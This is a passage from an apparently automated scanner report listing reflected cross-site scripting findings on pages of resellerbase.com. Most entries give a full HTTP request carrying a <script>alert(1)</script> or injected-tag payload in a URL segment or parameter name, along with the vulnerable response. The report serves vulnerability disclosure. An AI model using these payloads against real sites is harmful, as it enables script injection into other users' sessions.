Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail133ac<script>alert(1)</script>36a2c5b4540/20/rating.php was not found on this server.</p>
...[SNIP]...

2.1656. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b0ad<script>alert(1)</script>f115350e281141fba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail6b0ad<script>alert(1)</script>f115350e281141fba/20/rating.php?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6b0ad<script>alert(1)</script>f115350e281141fba/20/rating.php?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1657. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b62b3<script>alert(1)</script>b890b7c8af14a8beb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/20b62b3<script>alert(1)</script>b890b7c8af14a8beb/rating.php?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20b62b3<script>alert(1)</script>b890b7c8af14a8beb/rating.php?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1658. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66ab0<script>alert(1)</script>97554091c5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2066ab0<script>alert(1)</script>97554091c5f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2066ab0<script>alert(1)</script>97554091c5f/rating.php was not found on this server.</p>
...[SNIP]...

2.1659. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cbcc4<script>alert(1)</script>69bb9f4d99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/rating.phpcbcc4<script>alert(1)</script>69bb9f4d99 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.phpcbcc4<script>alert(1)</script>69bb9f4d99 was not found on this server.</p>
...[SNIP]...

2.1660. http://www.resellerbase.com/detail/20/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7ab9a<script>alert(1)</script>e2f1771785e146508 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/20/rating.php7ab9a<script>alert(1)</script>e2f1771785e146508?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.php7ab9a<script>alert(1)</script>e2f1771785e146508?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1661. http://www.resellerbase.com/detail/20/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f1b9<script>alert(1)</script>39204903d79b45566 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/20/rating.php/9f1b9<script>alert(1)</script>39204903d79b45566?id=20&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.php/9f1b9<script>alert(1)</script>39204903d79b45566?id=20&rating=5 was not found on this server.</p>
...[SNIP]...

2.1662. http://www.resellerbase.com/detail/20/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dafd5<script>alert(1)</script>c9a9a91f844 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/rating.php?dafd5<script>alert(1)</script>c9a9a91f844=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/rating.php?dafd5<script>alert(1)</script>c9a9a91f844=1 was not found on this server.</p>
...[SNIP]...

2.1663. http://www.resellerbase.com/detail/20/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50831<script>alert(1)</script>fe145bf4630 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50831<script>alert(1)</script>fe145bf4630/20/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50831<script>alert(1)</script>fe145bf4630/20/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1664. http://www.resellerbase.com/detail/20/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96c4d<script>alert(1)</script>4c4c5e5479f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2096c4d<script>alert(1)</script>4c4c5e5479f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2096c4d<script>alert(1)</script>4c4c5e5479f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1665. http://www.resellerbase.com/detail/20/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14b3b<script>alert(1)</script>def4e103be0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/search.php14b3b<script>alert(1)</script>def4e103be0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php14b3b<script>alert(1)</script>def4e103be0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1666. http://www.resellerbase.com/detail/20/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 711da<a>e3c023103fe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search711da<a>e3c023103fe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...&Submit3=Search711da<a>e3c023103fe&opt=2 was not found on this server.</p>
...[SNIP]...

2.1667. http://www.resellerbase.com/detail/20/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ed9fe<a>ee45a20e268 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/search.php?keyword=search...ed9fe<a>ee45a20e268&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...ed9fe<a>ee45a20e268&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1668. http://www.resellerbase.com/detail/20/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e548e<script>alert(1)</script>f622048bffe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search&opt=2&e548e<script>alert(1)</script>f622048bffe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...&Submit3=Search&opt=2&e548e<script>alert(1)</script>f622048bffe=1 was not found on this server.</p>
...[SNIP]...

2.1669. http://www.resellerbase.com/detail/20/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/20/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7a307<a>ad5df2ebc32 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/search.php?keyword=search...&Submit3=Search&opt=27a307<a>ad5df2ebc32 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/search.php?keyword=search...&Submit3=Search&opt=27a307<a>ad5df2ebc32 was not found on this server.</p>
...[SNIP]...

2.1670. http://www.resellerbase.com/detail/20/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb148<script>alert(1)</script>ed71c759f2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaileb148<script>alert(1)</script>ed71c759f2c/20/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaileb148<script>alert(1)</script>ed71c759f2c/20/themes/ was not found on this server.</p>
...[SNIP]...

2.1671. http://www.resellerbase.com/detail/20/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e02eb<script>alert(1)</script>3fa5db7203d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20e02eb<script>alert(1)</script>3fa5db7203d/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1672. http://www.resellerbase.com/detail/20/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cf6ac<script>alert(1)</script>7de78a31870 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themescf6ac<script>alert(1)</script>7de78a31870/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themescf6ac<script>alert(1)</script>7de78a31870/ was not found on this server.</p>
...[SNIP]...

2.1673. http://www.resellerbase.com/detail/20/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f82e<script>alert(1)</script>dd281557825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/?3f82e<script>alert(1)</script>dd281557825=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/?3f82e<script>alert(1)</script>dd281557825=1 was not found on this server.</p>
...[SNIP]...

2.1674. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ea5a<script>alert(1)</script>6634f508926 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5ea5a<script>alert(1)</script>6634f508926/20/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5ea5a<script>alert(1)</script>6634f508926/20/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1675. http://www.resellerbase.com/detail/20/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/20/themes/kosmos/

Issue detail

